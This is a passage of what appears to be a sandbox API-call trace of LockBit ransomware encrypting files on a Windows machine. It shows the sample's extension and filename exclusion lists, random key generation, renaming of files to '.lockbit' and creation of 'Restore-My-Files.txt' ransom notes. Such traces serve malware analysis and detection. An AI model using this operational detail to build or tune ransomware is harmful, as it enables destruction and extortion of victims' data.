[0154.491] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.492] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.492] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.493] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.493] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.493] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.493] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.493] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.493] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.514] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.514] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.514] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.514] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.514] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.514] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.514] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.514] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.514] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.514] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0287018.WMF") returned 1 [0154.514] lstrcmpiW (lpString1="ntldr", lpString2="J0287018.WMF") returned 1 [0154.514] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0287018.WMF") returned 1 [0154.514] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0287018.WMF") returned -1 [0154.514] lstrcmpiW (lpString1="autorun.inf", lpString2="J0287018.WMF") returned -1 [0154.514] lstrcmpiW (lpString1="thumbs.db", lpString2="J0287018.WMF") returned 1 [0154.514] lstrcmpiW (lpString1="iconcache.db", lpString2="J0287018.WMF") returned -1 [0154.514] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.514] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287018.WMF") returned=".WMF" [0154.514] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.514] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.515] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.515] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.515] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287018.WMF.lockbit") returned 72 [0154.516] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287018.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287018.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0154.517] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.517] malloc (_Size=0x40068) returned 0x3df0008 [0154.517] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=30872) returned 1 [0154.517] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.518] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0154.518] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.518] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0154.518] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0154.520] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287018.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287018.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.520] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.520] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.522] free (_Block=0x1fa2ed8) [0154.522] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287018.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.522] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.522] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.522] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5668dad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x931a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0287019.WMF", cAlternateFileName="")) returned 1 [0154.522] lstrcmpiW (lpString1=".", lpString2="J0287019.WMF") returned -1 [0154.522] lstrcmpiW (lpString1="..", lpString2="J0287019.WMF") returned -1 [0154.522] PathFindExtensionW (pszPath="J0287019.WMF") returned=".WMF" [0154.522] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.522] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.522] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.522] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.522] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.522] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.522] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.522] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.522] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.523] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.523] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.524] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0287019.WMF") returned 1 [0154.524] lstrcmpiW (lpString1="ntldr", lpString2="J0287019.WMF") returned 1 [0154.524] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0287019.WMF") returned 1 [0154.524] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0287019.WMF") returned -1 [0154.524] lstrcmpiW (lpString1="autorun.inf", lpString2="J0287019.WMF") returned -1 [0154.524] lstrcmpiW (lpString1="thumbs.db", lpString2="J0287019.WMF") returned 1 [0154.525] lstrcmpiW (lpString1="iconcache.db", lpString2="J0287019.WMF") returned -1 [0154.525] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.525] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287019.WMF") returned=".WMF" [0154.525] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.525] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.525] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.526] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.526] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.526] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.526] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.526] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.526] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.526] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287019.WMF.lockbit") returned 72 [0154.526] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287019.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287019.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0154.527] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.527] malloc (_Size=0x40068) returned 0x1ff1e60 [0154.527] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=37658) returned 1 [0154.527] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.528] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0154.528] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.528] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0154.528] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.533] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287019.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287019.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.533] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.533] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.534] free (_Block=0x1fa2ed8) [0154.534] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287019.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.534] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.534] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.534] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5668dad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x80d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0287020.WMF", cAlternateFileName="")) returned 1 [0154.534] lstrcmpiW (lpString1=".", lpString2="J0287020.WMF") returned -1 [0154.534] lstrcmpiW (lpString1="..", lpString2="J0287020.WMF") returned -1 [0154.535] PathFindExtensionW (pszPath="J0287020.WMF") returned=".WMF" [0154.535] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.535] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.536] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.536] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.537] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.537] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.537] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.537] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.537] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.537] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.537] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0287020.WMF") returned 1 [0154.537] lstrcmpiW (lpString1="ntldr", lpString2="J0287020.WMF") returned 1 [0154.537] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0287020.WMF") returned 1 [0154.537] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0287020.WMF") returned -1 [0154.537] lstrcmpiW (lpString1="autorun.inf", lpString2="J0287020.WMF") returned -1 [0154.537] lstrcmpiW (lpString1="thumbs.db", lpString2="J0287020.WMF") returned 1 [0154.537] lstrcmpiW (lpString1="iconcache.db", lpString2="J0287020.WMF") returned -1 [0154.537] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.537] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287020.WMF") returned=".WMF" [0154.537] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.537] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.537] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.537] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.537] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.538] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.539] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.539] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287020.WMF.lockbit") returned 72 [0154.539] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287020.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287020.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0154.550] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, 